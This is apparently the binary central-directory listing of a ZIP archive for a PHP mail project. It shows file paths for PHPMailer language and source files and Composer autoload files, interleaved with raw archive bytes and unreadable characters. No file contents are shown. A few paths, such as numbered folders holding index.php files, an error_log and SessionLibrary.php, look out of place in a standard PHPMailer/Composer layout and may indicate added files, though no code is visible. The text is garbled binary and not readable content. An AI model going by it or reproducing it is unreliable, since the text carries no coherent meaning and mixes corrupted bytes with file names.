2phpmailer/phpmailer/language/phpmailer.lang-it.phpnu[PK@fZ70\2phpmailer/phpmailer/language/phpmailer.lang-uk.phpnu[PK@fZF&2phpmailer/phpmailer/language/phpmailer.lang-mg.phpnu[PK@fZ`MM2+phpmailer/phpmailer/language/phpmailer.lang-ch.phpnu[PK@fZzjj2phpmailer/phpmailer/language/phpmailer.lang-lv.phpnu[PK@fZo|2phpmailer/phpmailer/language/phpmailer.lang-am.phpnu[PK@fZ|b2phpmailer/phpmailer/language/phpmailer.lang-et.phpnu[PK@fZVU2phpmailer/phpmailer/language/phpmailer.lang-tr.phpnu[PK@fZUj2phpmailer/phpmailer/language/phpmailer.lang-zh.phpnu[PK@fZ>2 phpmailer/phpmailer/language/phpmailer.lang-el.phpnu[PK@fZL̉2Mphpmailer/phpmailer/language/phpmailer.lang-eo.phpnu[PK@fZ l2/phpmailer/phpmailer/language/phpmailer.lang-ro.phpnu[PK@fZ60b2i$phpmailer/phpmailer/language/phpmailer.lang-ja.phpnu[PK@fZG2O,phpmailer/phpmailer/language/phpmailer.lang-gl.phpnu[PK@fZ9G2~3phpmailer/phpmailer/language/phpmailer.lang-ko.phpnu[PK@fZYcΨ2:phpmailer/phpmailer/language/phpmailer.lang-az.phpnu[PK@fZəww5Bphpmailer/phpmailer/language/phpmailer.lang-pt_br.phpnu[PK@fZk2Iphpmailer/phpmailer/language/phpmailer.lang-ar.phpnu[PK@fZ_ZZ2TRphpmailer/phpmailer/language/phpmailer.lang-lt.phpnu[PK@fZ'#D2Yphpmailer/phpmailer/language/phpmailer.lang-sk.phpnu[PK@fZul``2O`phpmailer/phpmailer/language/phpmailer.lang-pt.phpnu[PK@fZwnn2hphpmailer/phpmailer/language/phpmailer.lang-cs.phpnu[PK@fZ`  2nphpmailer/phpmailer/language/phpmailer.lang-hi.phpnu[PK@fZ~2byphpmailer/phpmailer/language/phpmailer.lang-id.phpnu[PK@fZX2++ phpmailer/phpmailer/src/POP3.phpnu[PK@fZъv% phpmailer/phpmailer/src/Exception.phpnu[PK@fZ!phpmailer/phpmailer/src/index.phpnu[PK@fZңC mphpmailer/phpmailer/src/SMTP.phpnu[PK@fZ'e^e^(]^phpmailer/phpmailer/src/107797/index.phpnu[PK@fZ؜ %phpmailer/phpmailer/src/PHPMailer.phpnu[PK@fZ@eo!r?phpmailer/phpmailer/src/OAuth.phpnu[PK@fZݺi,,cNphpmailer/phpmailer/COMMITMENTnu[PK@fZ}&jVphpmailer/phpmailer/SECURITY.mdnu[PK@fZvԲ iautoload.phpnu[PK@fZjsend-email.phpnu[PK@fZKBR$4$4 Fjstyle.phpnu[PK@fZEn autoload_classmap.phpnu[PK@fZz44composer/ClassLoader.phpnu[PK@fZ ..composer/LICENSEnu[PK@fZi qqcomposer/autoload_psr4.phpnu[PK@fZzcomposer/autoload_static.phpnu[PK@fZcomposer/autoload_real.phpnu[PK@fZ;~++,composer/installed.jsonnu[PK@fZ composer/index.phpnu[PK@fZb composer/autoload_classmap.phpnu[PK@fZ^Ŧ  composer/942549/697006/error_lognu[PK@fZa99  composer/942549/697006/index.phpnu[PK@fZķ5VaVaGcomposer/942549/index.phpnu[PK@fZ|6 composer/autoload_namespaces.phpnu[PK@fZEn composer/SessionLibrary.phpnu[PKSS"